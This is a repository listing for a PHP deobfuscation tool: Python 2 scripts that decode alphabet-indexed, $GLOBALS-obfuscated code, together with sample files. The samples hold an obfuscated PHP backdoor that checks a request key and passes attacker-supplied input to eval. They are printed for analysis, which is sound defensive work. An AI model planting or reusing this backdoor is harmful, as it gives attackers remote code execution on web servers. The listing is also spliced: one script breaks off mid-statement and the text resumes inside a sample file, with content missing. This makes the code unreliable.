├── Alphabet-Key.py
├── Alphabet-Soup.py
├── README.md
├── Sample-$GLOBALS
└── Sample.php

/Alphabet-Key.py:
--------------------------------------------------------------------------------
###############################################
# Version 1 #
# Deobfuscation of numbers: @Iamrasting #
# #
###############################################
# Purpose: replace every "[N]" index found in the pasted obfuscated PHP (`obs`)
# with the character at position N of `Alphabet`, quoted as a PHP string key
# ("['x']"), and print the result for the next manual conversion step.
# The script only does regex search and string replacement on the sample text;
# it never evaluates or executes any of it.
# NOTE: this file uses the Python 2 `print` statement; under Python 3 every
# `print '...'` line below is a SyntaxError.
import re

#Key
# PLEASE MAKE SURE THAT ALL HEX CODES ARE CORRECT. IF YOU HAVE ANY ERRORS ADD A 0 , FOR EXAMPLE \xd WILL BE \x0d . There are known occurrences.

# Lookup table: index N in the obfuscated code maps to Alphabet[N].
# This placeholder must be replaced with the real key before running.
Alphabet=" ENTER ALPHABET HERE "

# this is the obfuscated code we need to extract the numbers from
# (placeholder; paste the sample here as a Python string literal)
obs = "ENTER TO OBFUSCATED CODE HERE"

# This will take all numbers and convert to the correct character.
# It will print to the console the converted code. Please copy this code for further conversion.

# New Code
# ========

# First, find all the numbers that are contained within two square brackets
# e.g. the "[62]" in $tf7ebf['l94b537e'][62]
# re.findall returns only the capture group, so this is a list of decimal
# strings such as ['62', '3'].
obs_numbers = re.findall(r'\[(\d+)\]', obs)
print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers)

# Loop through each number from the previous step, and replace every
# "[{num}]" with the char from the corresponding index in `Alphabet`

# As these are string values and not integers, PHP will be expecting them
# to appear in quotation marks, as if you had the value [a] - that would cause
# a syntax error in PHP.
processed_obs = obs
for num in obs_numbers:
    # Plain substring replacement: every occurrence of "[N]" in the sample is
    # rewritten, including any that is not an Alphabet lookup (e.g. an ordinary
    # numeric array index), because the regex cannot tell them apart.
    search_for = '[{num}]'.format(num = num)
    # NOTE(review): Alphabet[int(num)] raises IndexError when N >= len(Alphabet);
    # there is no bounds check, so an incomplete key aborts the run part-way.
    replace_with = "['{c}']".format(c = Alphabet[int(num)])
    processed_obs = processed_obs.replace(search_for, replace_with)
    print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)])

print '------'
print 'Original: {obs}'.format(obs = obs)
print 'Processed: {obs}'.format(obs = processed_obs)

# Second pass: the literal text "[$GLOBALS[$GLOBALS]]" is replaced with "['']".
# The .format(obs = obs) call is a no-op (the template has no {obs} field) and
# replace_with2 always evaluates to "['']".
search_for2 = '[$GLOBALS[$GLOBALS]]'.format(obs = obs)
replace_with2 = "['{c}']".format(c = '')
processed_obs2 = processed_obs.replace(search_for2, replace_with2)

print 'Processed: {obs}'.format(obs = processed_obs2)

--------------------------------------------------------------------------------
/Alphabet-Soup.py:
--------------------------------------------------------------------------------
###############################################
# Version 3 #
# Deobfuscation of numbers: @Iamrasting #
# Deobfuscation of script: @5w0rdfish #
###############################################
# Purpose: read the obfuscated PHP sample line by line from globals.php, replace
# each "[N]" index with the character Alphabet[N] quoted as a PHP string key,
# then strip the variable names that carry the alphabet and the $GLOBALS
# indirection so the underlying code becomes readable.
# The visible part of the script only searches and replaces text; it never
# evaluates the sample.
# NOTE: Python 2 syntax throughout (`print` statements, str.translate(None, ...)).

import re

#Key
# Lookup table: index N maps to Alphabet[N]. The \xNN escapes are resolved by
# the Python string literal, so the table holds the raw characters, including
# the whitespace entries \x09, \x0a and \x0d.

Alphabet="\x5e\x71\x7c\x43\x7a\x6a\x23\x6d\x26\x2d\x44\x3c\x34\x27\x66\x52\x38\x4a\x29\x6f\x63\x35\x59\x0a\x51\x7e\x22\x3f\x6b\x2c\x65\x68\x61\x37\x4e\x09\x73\x3b\x76\x4d\x42\x7d\x7b\x55\x79\x4b\x56\x39\x2f\x77\x6c\x75\x6e\x2b\x78\x3d\x49\x4c\x24\x62\x21\x46\x31\x3a\x2a\x54\x70\x74\x45\x4f\x47\x64\x28\x5c\x2e\x30\x5d\x5b\x5f\x60\x3e\x67\x53\x32\x36\x69\x40\x5a\x20\x41\x57\x25\x58\x48\x0d\x50\x33\x72"
# this is the first part of obfuscated code we need to extract the numbers from

# globals.php is expected in the working directory; it is not part of this
# listing. Each line of the file is processed on its own, and because the loop
# runs at module level, names bound in one iteration remain visible in the next.
with open('globals.php') as infile:
    for obs in infile:

        # New Code
        # ========
        # First, find all the numbers that are contained within two square brackets
        # e.g.
        # the "[62]" in $tf7ebf['l94b537e'][62]
        # re.findall returns only the capture group: a list of decimal strings.
        obs_numbers = re.findall(r'\[(\d+)\]', obs)
        # print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers)
        # Loop through each number from the previous step, and replace every
        # "[{num}]" with the char from the corresponding index in `Alphabet`
        # As these are string values and not integers, PHP will be expecting them


        processed_obs = obs
        for num in obs_numbers:
            search_for = '[{num}]'.format(num = num)
            # NOTE(review): no bounds check — Alphabet[int(num)] raises IndexError
            # for any index >= len(Alphabet).
            replace_with = "['{c}']".format(c = Alphabet[int(num)])
            processed_obs = processed_obs.replace(search_for, replace_with)
            # print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)])
        print '------'


        #################################################################

        #find the variable defined as the Alphabet
        # NOTE: `[\'([a-z]` is a character class (one of ' ( [ or a-z), so this
        # pattern matches one such character followed by word characters that sit
        # directly before "']" — e.g. l94b537e in ['l94b537e']. It may not be the
        # pattern that was intended.
        varName2 = re.findall(r'([\'([a-z]\w+)\'\]', processed_obs)
        if len(varName2) > 1:

            # Second match is taken as the alphabet variable's name.
            alph = varName2[1]

            #turn to a string
            # (this value is overwritten further down before it is ever used)
            result = " ".join(str(x) for x in alph)

            print alph
            #remove all not required

            #return its name
            print ("#Alphabet " + str(alph))

        ################################################################
        # Indentation from here on is reconstructed from a collapsed listing.
        # NOTE(review): `alph` is only bound inside the `if` above; if the rest of
        # the loop body is not nested under that `if`, a line with fewer than two
        # matches reuses the previous line's value, or raises NameError on the
        # first line — confirm against the original file.

        #find the variable defined as $GLOBALS
        # `[GLOBALS]` is a character class matching a single letter, so group 1 is
        # that letter plus the following word characters (e.g. "GLOBAL") and group
        # 2 the quoted key; the stray letters are deleted again by bad_chars below.
        varName = re.findall(r'\$([GLOBALS]\w+)\S\[\'([a-z]\w+)\'\]', processed_obs)
        #turn to a string
        result = " ".join(str(x) for x in varName)

        #remove all not required
        # ''.join flattens this list into a set of single characters, so 'GLOBAL'
        # deletes every G, L, O, B and A individually, not the word.
        bad_chars = [' ', ',','GLOBAL','[', ']','.','\'']
        # NOTE: str.translate(None, deletechars) is the Python 2 signature.
        varName = result.translate(None, ''.join(bad_chars))
        #return its name
        print ("#$GLOBALS " + str(varName))
        print '------'
        ################################################################

        # We are going to remove all $GLOBALS that are not required
        s = processed_obs
        e = {varName : ""}

        def find_replace_multi(string, dictionary):
            """Apply every key -> value pair of `dictionary` to `string` with
            re.sub and return the result.

            NOTE(review): each key is handed to re.sub as a regex pattern, not as
            a literal. The keys here are variable names extracted from the
            obfuscated sample, so any regex metacharacter in such a name changes
            what gets replaced; re.escape(item) or str.replace would treat the
            name literally.
            """
            for item in dictionary.keys():
                # sub item for item's paired value in string
                string = re.sub(item, dictionary[item], string)
            return string
        string = find_replace_multi(s, e)

        # We are going to remove all $GLOBALS that are not required
        s = string
        e = {alph : ""}

        # Identical re-definition of the helper above (same body); it rebinds the
        # same name, and both definitions are re-created on every loop iteration.
        def find_replace_multi(string, dictionary):
            """Same as the definition above: re.sub each key (as a regex) with its value."""
            for item in dictionary.keys():
                # sub item for item's paired value in string
                string = re.sub(item, dictionary[item], string)
            return string
        string = find_replace_multi(s, e)


        ##################################################################
        # We remove any other characters not required
        bad_chars = ['.','\'']
        # Translate these to our blank space
        # (Python 2 signature again: the joined characters are deleted, not
        # replaced with a space.)
        string = string.translate(None, ''.join(bad_chars))

        #remove the extra $ signs
        # This pattern is a single character class, so it deletes every ( [ ] )
        # and . individually; it does not touch "$".
        string = re.sub("[(\[\])(\[.\])]", "", string)
        # NOTE(review): the listing is cut off here. The rest of this statement,
        # the remainder of Alphabet-Soup.py and the start of Sample-$GLOBALS
        # (through its line 46) are missing — apparently text between a "<" and
        # the next ">" was lost in extraction — so the pattern below is
        # incomplete and the PHP that follows is the tail of Sample-$GLOBALS
        # line 46.
        string = re.sub("[.(? $f5a8) {
$j1cf72 = $f5a8;
$xefb = $x261be0;
}
if (!$j1cf72) {
foreach($GLOBALS[$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][21]] as$x261be0 => $f5a8) {
$j1cf72 = $f5a8;
$xefb = $x261be0;
}
}
$j1cf72 = @$GLOBALS$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][62];
if (isset($j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) && $jc17 == $j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) {
if ($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][85]) {
$a05a = Array($GLOBALS['l94b537e'][66].$GLOBALS['l94b537e'][38] => @$GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][71], $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][38] =>
$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][74].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][62], ); 60 | echo@ $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][21]; 61 | } 62 | elseif($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][30]) { 63 | eval / a684ebc / ($j1cf72[$GLOBALS['l94b537e'][71]]); 64 | } 65 | exit(); 66 | } ?> 67 | -------------------------------------------------------------------------------- /Sample.php: -------------------------------------------------------------------------------- 1 | $f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}if(!$j1cf72){foreach($tf7ebf[$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][21]]as$x261be0=>$f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}}$j1cf72=@$tf7ebf$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][62];if(isset($j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]])&&$jc17==$j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]]){if($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][85]){$a05a=Array($tf7ebf['l94b537e'][66].$tf7ebf['l94b537e'][38]=>@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][71],$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][38]=>$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][74].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][62],);echo@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][21];}elseif($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][30]){eval/a684ebc/($j1cf72[$tf7ebf['l94b537e'][71]]);}exit();} ?> 2 | 
--------------------------------------------------------------------------------